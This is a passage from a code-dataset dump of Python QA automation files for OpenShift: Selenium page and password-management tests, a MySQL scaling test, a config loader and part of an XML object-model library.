'''//div[@id='node-10295']/div/ol/li''') \n web.assert_text_equal_by_xpath('''Jenkins waits for this commit, runs a full series of tests (customized by the developer)''', '''//div[@id='node-10295']/div/ol/li[2]''')\n web.assert_text_equal_by_xpath('''With OpenShift, if the tests and build are successful, the new code gets deployed. If it fails, the old code continues to run with no downtime related to the push.''', '''//div[@id='node-10295']/div/ol/li[3]''') \n web.assert_text_equal_by_xpath('''Users can review the persistent build history maintained by Jenkins''', '''//div[@id='node-10295']/div/ol/li[4]''')\n web.assert_text_equal_by_xpath('''How can you get started? First, make sure you are running the latest rhc tools (gem update rhc or yum update rhc). Then follow these steps:''', '''//div[@id='node-10295']/div/p[4]''') \n web.assert_text_equal_by_xpath('''Step 1 - Create Jenkins''', '''//div[@id='node-10295']/div/h3''')\n web.assert_text_equal_by_xpath('''$ rhc app create -a jenkins -t jenkins-1.4''', '''//div[@id='node-10295']/div/pre/code''') \n web.assert_text_equal_by_xpath('''Note the administrator username and password that is created and returned from rhc. 
This will be needed to administer Jenkins.''', '''//div[@id='node-10295']/div/p[5]''') \n web.assert_text_equal_by_xpath('''Step 2 - Create an Application with Embedded Jenkins''', '''//div[@id='node-10295']/div/h3[2]''')\n web.assert_text_equal_by_xpath('''For a new application:''', '''//div[@id='node-10295']/div/p[6]''')\n web.assert_text_equal_by_xpath('''$ rhc app create -a jboss1 -t jbossas-7 --enable-jenkins''', '''//div[@id='node-10295']/div/pre[2]/code''') \n web.assert_text_equal_by_xpath('''For an existing application:''', '''//div[@id='node-10295']/div/p[7]''')\n web.assert_text_equal_by_xpath('''$ rhc app cartridge add -a jboss1 -c jenkins-client-1.4''', '''//div[@id='node-10295']/div/pre[3]/code''') \n web.assert_text_equal_by_xpath('''This will create a Jenkins Job specifically configured for the application including parameters such as the builder size, DNS resolution timeout, and the application's git repo URL. These parameters and more can be managed via the Jenkins web UI.''', '''//div[@id='node-10295']/div/p[8]''')\n web.assert_text_equal_by_xpath('''Step 3 - Modify and Push your Application''', '''//div[@id='node-10295']/div/h3[3]''')\n web.assert_text_equal_by_xpath('''$ git push''', '''//div[@id='node-10295']/div/pre[4]/code''')\n web.assert_text_equal_by_xpath('''This will trigger the build/test/deploy sequence in Jenkins.''', '''//div[@id='node-10295']/div/p[9]''')\n web.assert_text_equal_by_xpath('''When a build is triggered, Jenkins first needs to schedule the build. The scheduling process involves creating a temporary builder for the application. On the Jenkins side, a Node (aka Slave) is created. In OpenShift, a corresponding builder Application is created named appnamebldr. If the Node/builder already exists at scheduling then the existing builder will be used and the build will immediately fire. NOTE: This Node and builder Application will consume one Gear. Nodes and builder Applications are automatically deleted and the corresponding Gear is freed after 15 idle minutes.''', '''//div[@id='node-10295']/div/p[10]''')\n web.assert_text_equal_by_xpath('''To troubleshoot errors that occur during the build/test/deploy phase with Jenkins, from a git push, etc. there are three logs that will indicate the problem in most cases.''', '''//div[@id='node-10295']/div/p[11]''')\n web.assert_text_equal_by_xpath('''Logging for Application level errors (e.g. compilation failures, test failures) is available via the Jenkins web UI under the corresponding Node's build history.''', '''//div[@id='node-10295']/div/p[12]''')\n web.assert_text_equal_by_xpath('''Logging for Jenkins level errors (e.g. 
DNS timeouts, builder configuration) is available in the Jenkins logs at:''', '''//div[@id='node-10295']/div/p[13]''')\n web.assert_text_equal_by_xpath('''$ rhc app tail -a jenkins''', '''//div[@id='node-10295']/div/pre[5]/code''')\n web.assert_text_equal_by_xpath('''$ rhc app tail -a jboss1''', '''//div[@id='node-10295']/div/pre[6]/code''')\n web.click_element_by_link_text(\"Subscribe To This Thread\")\n web.check_title(\"Confirm your subscription | OpenShift by Red Hat\")\n web.go_back() \n web.click_element_by_link_text(\"Subscribe To: Posts Of Type Page\")\n web.check_title(\"Confirm your subscription | OpenShift by Red Hat\")\n web.go_back()\n web.click_element_by_link_text(\"Subscribe To [email protected]\")\n web.check_title(\"Confirm your subscription | OpenShift by Red Hat\")\n \n self.tearDown()\n\n return self.passed(\"Case 163038 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_jenkins_page)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_163038.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6411368250846863, "alphanum_fraction": 0.6449903845787048, "avg_line_length": 27.83333396911621, "blob_id": "3ca66092eb6a977ddfda364ade489152559b8009", "content_id": "14182de5fee08d1f7d6f54093f77fa49a8f6aa1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2076, "license_type": "no_license", "max_line_length": 92, "num_lines": 72, "path": "/automation/open/lib/storage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nfile for getting config\n\"\"\"\nimport database\nimport simplejson as json\nimport dictlib\nimport os\nimport commands\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nwork_dir = os.path.abspath(file_path + \"/../\")\n\n\ndef get_config():\n \"\"\"\n return a dot accessible dictionary of default configurations. 
Will try to\n read from a local storage (a json file) or from an external db if nothing\n can be read from local\n \"\"\"\n config = None\n \n try:\n fname = os.path.join(work_dir, \"etc\", \"config.json\")\n if os.environ.has_key(\"RHTEST_HOME\"):\n fname = os.path.join(os.environ[\"RHTEST_HOME\"], \"etc\", \"config.json\")\n config_json = open(fname, 'r')\n config_str = json.load(config_json)\n config = dictlib.AttrDictWrapper(config_str)\n except:\n print >>sys.stderr, \"Error encountered reading from local, trying from remote DB...\"\n config_dict = database.get_defaults()\n config = dictlib.AttrDictWrapper(config_dict)\n return config\n\ndef get_logfilename(cf):\n import logfile\n user_name = commands.getoutput('whoami')\n lfd = \"/var/tmp/%s\" % user_name\n if not os.path.isdir(lfd):\n os.mkdir(lfd)\n logfilename = os.path.join(os.path.expanduser(lfd), cf.logbasename)\n cf['logfilename'] = logfilename\n return logfilename\n\ndef get_logfile(cf):\n import logfile\n lfname = get_logfilename(cf)\n\n try:\n lf = logfile.ManagedLog(lfname, 1000000)\n except:\n ex, val, tb = sys.exc_info()\n print >>sys.stderr, \"get_logfile: Could not open log file.\"\n print >>sys.stderr, ex, val\n return _StdErrLog()\n else:\n return lf\n \ndef get_report(cf):\n import reports\n # take out extension\n logname_without_extension = os.path.splitext(cf.logbasename)[0]\n log_path = os.path.join(cf.resultsdir, logname_without_extension)\n \n params = ('StandardReport', log_path ,'text/html')\n return reports.get_report(params)\n\ndef get_ui(cf):\n import CLI\n return CLI.get_terminal_ui(cf)\n" }, { "alpha_fraction": 0.685756266117096, "alphanum_fraction": 0.6922593116760254, "avg_line_length": 50.25806427001953, "blob_id": "9da36f208413da79558e20c1b6226354e42d31f5", "content_id": "bda22b1ae49441909b7bad4671215d40f2a4ae3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4767, "license_type": "no_license", "max_line_length": 169, "num_lines": 93, "path": "/automation/open/testmodules/UI/web/tc_passwordmanage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\n\nclass ManagePassword(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test_a_reset_pwd_with_blank_email(self):\n baseutils.reset_password(self,\"\")\n baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"label.error\")\n \n def test_b_reset_pwd_with_invalid_email(self):\n baseutils.reset_password(self,\"1234567\")\n baseutils.assert_text_equal_by_css(self,\"Please enter a valid email address.\",\"label.error\")\n\n def test_c_reset_pwd_with_existing_account(self):\n baseutils.reset_password(self,\"[email protected]\")\n baseutils.assert_text_equal_by_css(self,\"The information you have requested has been emailed to you at [email protected].\",\"div.message.success\") \n \n def test_ca_reset_pwd_without_refresh(self):\n baseutils.reset_password(self,\"[email protected]\")\n time.sleep(5)\n baseutils.assert_element_present_by_xpath(self,\"//div[@id='password-reset-form']/form/div/input[@type='hidden']\")\n \n# 
self.driver.assertFalse(self.is_element_present(By.CSS_SELECTOR, \"#password-reset-form > form > input.button\"))\n \n def test_cb_reset_pwd_with_refresh(self):\n baseutils.reset_password(self,\"[email protected]\")\n# self.driver.assertFalse(self.is_element_present(By.ID,\"email_input\"))\n# baseutils.assert_element_not_present_by_css(self,\"#password-reset-form > form > input.button\")\n self.driver.refresh()\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.click_element_by_xpath(self,\"//*[@id='lost_password']/p/a\")\n time.sleep(2)\n baseutils.assert_element_present_by_id(self,\"email_input\")\n baseutils.assert_element_present_by_css(self,\"#password-reset-form > form > input.button\")\n \n def test_d_reset_pwd_with_non_existing_account(self):\n baseutils.reset_password(self,\"[email protected]\")\n baseutils.assert_text_equal_by_css(self,\"The information you have requested has been emailed to you at [email protected].\",\"div.message.success\")\n\n \n def test_e_change_pwd_w_incorrect_oldpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],\"654321\",config.tochangepwduser[2],config.tochangepwduser[2])\n baseutils.assert_text_equal_by_css(self,\"Your old password was incorrect\",\"div.message.error\")\n \n def test_f_change_pwd_w_invalid_newpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],config.tochangepwduser[1],\"12345\",\"12345\")\n baseutils.assert_text_equal_by_css(self,\"PLEASE ENTER AT LEAST 6 CHARACTERS.\",\"fieldset.confirm > label.error\")\n \n def test_g_change_pwd_w_mismatch_newpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],config.tochangepwduser[1],\"123456\",\"1234567\")\n baseutils.assert_text_equal_by_css(self,\"PLEASE ENTER THE SAME VALUE AGAIN.\",\"fieldset.confirm > label.error\")\n \n def test_h_change_pwd_w_blank_oldpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],\"\",\"123456\",\"123456\")\n baseutils.assert_text_equal_by_css(self,\"THIS FIELD IS REQUIRED.\",\"label.error\")\n \n def test_i_change_pwd_normally(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],config.tochangepwduser[1],config.tochangepwduser[2],config.tochangepwduser[2])\n baseutils.assert_text_equal_by_css(self,\"Your password has been successfully changed\",\"div.message.success\")\n \n def test_z_login_with_changed_pwd(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.tochangepwduser[0],config.tochangepwduser[2])\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n baseutils.assert_element_present_by_link_text(self,\"Sign out\") \n _greetings=baseutils.generate_greetings(config.tochangepwduser[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n \n def tearDown(self):\n self.driver.quit()\n if len(self.verificationErrors)==1:\n self.assertEqual([''], self.verificationErrors)\n else:self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5713208913803101, "alphanum_fraction": 0.5765969753265381, "avg_line_length": 36.11188888549805, "blob_id": "35f7d554c35d4cd1c13b2a6e8942a8318b9a3abf", "content_id": "1b9774c1a8059aaf11b0d4f17efcb2cd5035c910", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5307, "license_type": 
"no_license", "max_line_length": 132, "num_lines": 143, "path": "/automation/open/testmodules/RT/scaling/python27_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\n# user defined packages\nimport openshift\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_name = 'mypython' + common.getRandomString()\n self.rest_client = openshift.Openshift(host=self.config.instance_info['ip'],\n user=self.user_email, \n passwd=self.user_passwd)\n self.app_type = common.app_types[\"python-2.7\"]\n \n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass PythonMysqlScaling(OpenShiftTest):\n def check_mysql_result(self, app_name):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page(\"http://%s/mysql\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", 5, 4)\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_scalable_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name],\n expect_description = \"App should be created successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Copy template files\",\n \"cp '%s/cartridge/app_template/mysql/applicationpython-2.7' '%s/wsgi/application'\" % (WORK_DIR + \"/../\", self.app_name),\n expect_description = \"Operation must be successfull\",\n expect_return = 0\n ))\n self.steps_list.append(testcase.TestCaseStep(\n \"Install MySQL-python\",\n \"sed -i -e \\\"s/#\\s*'MySQL-python',/'MySQL-python',/g\\\" %s/setup.py\" %(self.app_name),\n expect_description = \"Operaion must be successfull\",\n expect_return = 0\n ))\n #5\n self.steps_list.append(testcase.TestCaseStep(\n \"git push codes\",\n \"cd %s && git add . 
&& git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0\n ))\n\n #6\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result\",\n self.check_mysql_result,\n function_parameters = [ self.app_name ],\n expect_description = \"MySQL operation must be successful\",\n expect_return = 0\n ))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"Operation must be successful\",\n expect_return = 0\n ))\n\n for i in range(1,4):\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - %d\" % i,\n self.check_mysql_result,\n function_parameters = [ self.app_name ],\n expect_description = \"MySQL operation must be successful\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-down the application via Rest API\",\n common.scale_down,\n function_parameters = [ self.app_name ],\n expect_description = \"Operation must be successful\",\n expect_return = 0,\n try_interval=5,\n try_count=6))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n function_parameters = [ self.app_name ],\n expect_description = \"MySQL operation must be successful\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successful\",\n expect_return = 0\n ))\n\n case = testcase.TestCase(\"[US2005][Runtime][rhc-cartridge]Embed mysql to scalable apps: python\", self.steps_list)\n case.run()\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PythonMysqlScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6683411598205566, "alphanum_fraction": 0.6711255311965942, "avg_line_length": 26.429922103881836, "blob_id": "7474591dd9846a27939c3ddf62b37d699fc8405", "content_id": "821b65366f670e79067250281839b8c2647ac278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34837, "license_type": "no_license", "max_line_length": 140, "num_lines": 1270, "path": "/automation/open/lib/supports/XML/POM.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python -i\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nThis module implements the XML POM -- the Python Object Model for XML. It is\nsomething like DOM, but more Pythonic, and easier to use. These base classes\nare used to build POM source files which are self-validating python-based XML\nconstructor objects. 
The major parts of the dtd2py command line tool are also\nhere.\n\n\"\"\"\n\nimport sys, os, re\n\n\ntry:\n\tfrom cStringIO import StringIO\nexcept ImportError:\n\tfrom StringIO import StringIO\n\nfrom textutils import identifier, maketrans\n\nDEFAULT_ENCODING = \"utf-8\"\n\ndef set_default_encoding(newcodec):\n\tglobal DEFAULT_ENCODING \n\tDEFAULT_ENCODING = str(newcodec)\n\ntry:\n\tTrue\nexcept NameError:\n\tTrue = 1\n\tFalse = 0\n\n\nclass ValidationError(ValueError):\n\t\"\"\"ValidationError\n\tThis exception is raised when an attempt is made to construct an XML POM\n\ttree that would be invalid.\n\n\t\"\"\"\n\tpass\nadd_exception(ValidationError)\n\ndef get_getter(dtdmod):\n\tdef _element_getter(dtdmod, nodename):\n\t\treturn getattr(dtdmod, identifier(nodename))\n\treturn curry(_element_getter, dtdmod)\n\n\n#########################################################\n# XML generating classes\n# These classes are used to generate XML documents, similar to DOM. But, this\n# interface is simpler and more Python-ic.\n#########################################################\n# plain text data to be added to a GenericNode.\n# This class needs to support much of the ElementNode interface, but\n# implemented differently.\nclass Text(object):\n\tdef __init__(self, data=\"\", encoding=None):\n\t\tself._parent = None\n\t\tself.set_text(data, encoding)\n\tdef set_text(self, data, encoding=None):\n\t\tenc = encoding or DEFAULT_ENCODING\n\t\tself.data = unescape(POMString(data, enc))\n\t\tself.encoding = enc\n\tdef get_text(self):\n\t\treturn self.data\n\tdef insert(self, data, encoding=None):\n\t\tself.data = unescape(POMString(data, encoding or self.encoding)) + self.data\n\tdef add_text(self,data, encoding=None):\n\t\tself.data += unescape(POMString(data, encoding or self.encoding))\n\tappend = add_text\n\t__iadd__ = add_text\n\tdef __str__(self):\n\t\treturn escape(str(self.data))\n\tdef __unicode__(self):\n\t\treturn escape(self.data)\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%r)\" % (cl.__module__, cl.__name__, escape(self.data))\n\tdef __len__(self):\n\t\treturn len(self.data)\n\tdef __getslice__(self, start, end):\n\t\treturn self.data[start:end]\n\tdef __setslice__(self, start, end, v):\n\t\tself.data[start:end] = v\n\tdef __delslice__(self, start, end):\n\t\tdel self.data[start:end]\n\tdef get_escape_length(self):\n\t\treturn len(escape(self.data))\n\tdef destroy(self):\n\t\tself.data = None\n\t\tself._parent = None\n\tdef fullpath(self):\n\t\tif self._parent:\n\t\t\treturn \"%s = %r\" % (self._parent.fullpath(), self.data)\n\t\telse:\n\t\t\treturn `self.data`\n\tdef emit(self, fo):\n\t\tfo.write( escape(self.data) )\n\t# dummy methods, for polymorphism with ElementNode\n\tdef matchpath(self, pe):\n\t\treturn 0\n\tdef has_children(self):\n\t\treturn 0\n\tdef has_attributes(self):\n\t\treturn 0\n\nclass Comment(Text):\n\tdef __init__(self, data=\"\", encoding=None):\n\t\tself.data = POMString(data, encoding or DEFAULT_ENCODING)\n\t\tself._parent = None\n\tdef __str__(self):\n\t\treturn \"<!-- %s -->\" % (self._fix(self.data),)\n\tdef __unicode__(self):\n\t\treturn u\"<!-- %s -->\" % (self._fix(self.data),)\n\tdef emit(self, fo):\n\t\tfo.write( self.__str__() )\n\tdef set_text(self, data):\n\t\tself.data = POMString(data)\n\tdef get_text(self):\n\t\treturn self.data\n\tdef insert(self, data):\n\t\tself.data = POMString(data) + self.data\n\tdef add_text(self,data, encoding=None):\n\t\tself.data += POMString(data, encoding or DEFAULT_ENCODING)\n\tappend = 
add_text\n\tdef _fix(self, data):\n\t\tdata = escape(data)\n\t\tif data.find(u\"--\") != -1:\n\t\t\tdata = data.replace(u\"--\", u\"- \")\n\t\treturn data\n\nclass ASIS(object):\n\t\"\"\"Holder for pre-made markup that may be inserted into POM tree. It is a\n\ttext leaf-node only. You can cache pre-constructed markup and insert it\n\tinto the POM to speed up some page emission. \"\"\"\n\tdef __init__(self, data, encoding=None):\n\t\tself._parent = None\n\t\tself.set_text(data, encoding)\n\tdef set_text(self, data, encoding=None):\n\t\tenc = encoding or DEFAULT_ENCODING\n\t\tself.data = POMString(data, enc)\n\t\tself.encoding = enc\n\tdef get_text(self):\n\t\treturn self.data\n\tdef insert(self, data, encoding=None):\n\t\traise NotImplementedError\n\tdef add_text(self,data, encoding=None):\n\t\traise NotImplementedError\n\tappend = add_text\n\t__iadd__ = add_text\n\tdef __str__(self):\n\t\treturn str(self.data)\n\tdef __unicode__(self):\n\t\treturn self.data\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s()\" % (cl.__module__, cl.__name__)\n\tdef __len__(self):\n\t\treturn len(self.data)\n\tdef __getslice__(self, start, end):\n\t\treturn self.data[start:end]\n\tdef __setslice__(self, start, end, v):\n\t\tself.data[start:end] = v\n\tdef __delslice__(self, start, end):\n\t\tdel self.data[start:end]\n\tdef get_escape_length(self):\n\t\treturn len(self.data)\n\tdef destroy(self):\n\t\tself.data = None\n\t\tself._parent = None\n\tdef fullpath(self):\n\t\tif self._parent:\n\t\t\treturn \"%s = %r\" % (self._parent.fullpath(), self.data)\n\t\telse:\n\t\t\treturn `self.data`\n\tdef emit(self, fo):\n\t\tfo.write( self.data )\n\t# dummy methods, for polymorphism with ElementNode\n\tdef matchpath(self, pe):\n\t\treturn 0\n\tdef has_children(self):\n\t\treturn 0\n\tdef has_attributes(self):\n\t\treturn 0\n\n\n# abstract base class for generic XML node generation. \n# Create an XML node by subclassing this and defining allowed attribute names\n# in ATTLIST. CONTENTMODEL holds the content specification from the DTD.\n# Use the dtd2py program to convert a DTD to a python module that has classes\n# for element types. 
Use that python dtd as a paramter for the POMDocument,\n# below.\n\nclass ElementNode(object):\n\tATTLIST = None\n\tCONTENTMODEL = None\n\t_name = None\n\t_namespace = None\n\t_acquired = {\"_namespace\":None } # default acquired values\n\tdef __init__(self, **attribs):\n\t\tself._attribs = {}\n\t\tfor key, value in attribs.items():\n\t\t\tif self._validate_attribute(key, value):\n\t\t\t\tself._attribs[key] = value\n\t\t\telse:\n\t\t\t\traise ValidationError, \"invalid attribute name for this element\"\n\t\tself._children = []\n\t\tself._parent = None\n\n \t# check if attribute name is defined for this element\n\tdef _validate_attribute_name(self, name):\n\t\tif self.ATTLIST:\n\t\t\tfor xmlattr in self.ATTLIST:\n\t\t\t\tif name == xmlattr.name:\n\t\t\t\t\treturn True\n\t\treturn False\n\n\tdef _validate_attribute(self, name, value):\n\t\tif self.ATTLIST:\n\t\t\tfor xmlattr in self.ATTLIST:\n\t\t\t\tif name == xmlattr.name:\n\t\t\t\t\treturn xmlattr.verify(value)\n\t\treturn False\n\t\n\tdef _verify_attributes(self):\n\t\tif not self.ATTLIST:\n\t\t\treturn None\n\t\tfor attr in self.ATTLIST:\n\t\t\taval = self._attribs.get(attr.name, None)\n\t\t\tif aval is None:\n\t\t\t\tif attr.a_decl == REQUIRED:\n\t\t\t\t\traise ValidationError, \"required attribute not present: \" + attr.name\n\t\t\telse:\n\t\t\t\tattr.verify(aval)\n\n\tdef _get_attribute(self, name):\n\t\tif not self.ATTLIST:\n\t\t\treturn None\n\t\ttry:\n\t\t\treturn self._attribs[name]\n\t\texcept KeyError:\n\t\t\t# might be implied, fixed, or enum...\n\t\t\tfor xmlattr in self.ATTLIST:\n\t\t\t\tif name == xmlattr.name:\n\t\t\t\t\tif xmlattr.a_decl == IMPLIED:\n\t\t\t\t\t\treturn \"\"\n\t\t\t\t\telif xmlattr.a_decl == FIXED:\n\t\t\t\t\t\treturn xmlattr.default\n\t\t\t\t\telif xmlattr.a_decl == DEFAULT: # an enum type\n\t\t\t\t\t\treturn xmlattr.default\n\t\treturn None\n\t\t\n\tdef get_parent(self):\n\t\treturn self._parent\n\t\n\tdef reparent(self, newparent):\n\t\tif self._parent:\n\t\t\ti = self._parent.index(self)\n\t\t\tdel self._parent[i]\n\t\tnewparent.append(self)\n\t\n\tdef detach(self):\n\t\tself._parent = None\n\n\tdef destroy(self):\n\t\t\"\"\"destroy() Remove this node and all child node references.\"\"\"\n\t\t# remove parent _children list reference\n\t\tif self._parent:\n\t\t\ti = self._parent.index(self)\n\t\t\tdel self._parent[i]\n\t\tself._parent = None\n\t\tfor n in self._children:\n\t\t\tn.detach()\n\t\tself._children = None\n\t\n\tdef set_namespace(self, ns):\n\t\tself._namespace = ns\n\n\tdef index(self, obj):\n\t\tobjid = id(obj)\n\t\ti = 0\n\t\tfor o in self._children:\n\t\t\tif id(o) == objid:\n\t\t\t\treturn i\n\t\t\ti += 1\n\t\traise ValueError, \"ElementNode: Object not contained here.\"\n\n\tdef append(self, obj):\n\t\t\"\"\"Append an existing DTD object instance.\"\"\"\n\t\tobj._parent = self\n\t\tself._children.append(obj)\n\t\n\tdef extend(self, objlist):\n\t\tfor obj in objlist:\n\t\t\tself.append(obj)\n\n\tdef insert(self, index, obj):\n\t\tobj._parent = self\n\t\tself._children.insert(index, obj)\n\n\tdef add(self, klass, **kwargs):\n\t\t\"\"\"Add an element class from a dtd module.\"\"\"\n\t\tobj = apply(klass, (), kwargs)\n\t\tself.append(obj)\n\t\treturn obj\n\n\tdef get_children(self):\n\t\treturn self._children[:]\n\n\tdef __iter__(self):\n\t\treturn iter(self._children)\n\n\tdef add_text(self, text, encoding=None):\n\t\t\"Adding text to elements is so common, there is a special method for it.\"\n\t\tif self.has_children() and isinstance(self._children[-1], 
Text):\n\t\t\tself._children[-1].add_text(text, encoding)\n\t\telse:\n\t\t\tt = Text(text, encoding)\n\t\t\tself.append(t)\n\t\n\tdef replace_text(self, text):\n\t\tif self._children:\n\t\t\tdel self._children[-1]\n\t\tself.append(Text(text))\n\n\tdef __len__(self):\n\t\treturn len(self._children)\n\t\n\t# The truth is, we exist.\n\tdef __nonzero__(self):\n\t\treturn True\n\n\tdef hasAttributes(self):\n\t\treturn len(self._attribs)\n\thas_attributes = hasAttributes\n\t\n\tdef has_attribute(self, name):\n\t\tif name in self._attribs.keys():\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef attributes(self):\n\t\treturn map(lambda o: o.name, self.ATTLIST)\n\n\tdef has_children(self):\n\t\treturn len(self._children)\n\n\tdef set_attribute(self, name, val):\n\t\t\"\"\"set_attribute(name, value)\n\t\tThis exists to set attributes that have names with characters that make\n\t\tit an illegal Python identifier. \"\"\"\n\t\tif self._validate_attribute(name, val):\n\t\t\tself._attribs[name] = val\n\n\tdef get_attribute(self, name):\n\t\t\"\"\"get_attribute(name)\n\t\tUse this method to get attributes that have names with characters that make\n\t\tit an illegal Python identifier. \"\"\"\n\t\treturn self._get_attribute(name)\n\n\tdef __setattr__(self, name, value):\n\t\tif self._validate_attribute(name, value):\n\t\t\tself._attribs[name] = value\n\t\telse:\n\t\t\tself.__dict__[name] = value\n\n\t# this plus the _parent and _acquired attributes implement \"acquisiton\", \n\t# or run-time inheritance.\n\tdef __getattr__(self, name):\n\t\tdefval = self._get_attribute(name)\n\t\tif defval is not None:\n\t\t\treturn defval\n\t\ttry:\n\t\t\treturn self._acquire(name)\n\t\texcept:\n\t\t\tpass\n\t\traise AttributeError, \"AttributeError: %s has no attribute '%s'\" % (self._name, name)\n\n\tdef _acquire(self, name):\n\t\tif self._parent:\n\t\t\ttry:\n\t\t\t\treturn self._parent.__dict__[name]\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\t\treturn self._parent._acquire(name)\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn self._acquired[name]\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\traise AttributeError\n\n\tdef __delattr__(self, name):\n\t\tdel self._attribs[name]\n\n\tdef _find_index(self, index):\n\t\tif type(index) is str:\n\t\t\tfor i in xrange(len(self._children)):\n\t\t\t\tif self._children[i].matchpath(index):\n\t\t\t\t\treturn i\n\t\t\traise IndexError, \"no elements match\"\n\t\telse:\n\t\t\treturn index\n\n\tdef __getitem__(self, index):\n\t\tif type(index) is str:\n\t\t\tel = self.get_element(index)\n\t\t\tif el is None:\n\t\t\t\traise IndexError, \"no item matches\"\n\t\t\telse:\n\t\t\t\treturn el\n\t\telse:\n\t\t\treturn self._children[index]\n\t\n\tdef __setitem__(self, index, obj):\n\t\tindex = self._find_index(index)\n\t\tobj._parent = self\n\t\tself._children[index] = obj\n\t\n\tdef __delitem__(self, index):\n\t\tindex = self._find_index(index)\n#\t\tself._children[index].destroy()\n\t\tdel self._children[index]\n\n\tdef __repr__(self):\n\t\tattrs = map(lambda t: '%s=%r' % t, self._attribs.items())\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%s)\" % (cl.__module__, cl.__name__, \", \".join(attrs))\n\n\tdef __str__(self):\n\t\tself._verify_attributes()\n\t\tif not self.CONTENTMODEL or self.CONTENTMODEL.is_empty():\n\t\t\treturn self._empty_str()\n\t\telse:\n\t\t\treturn 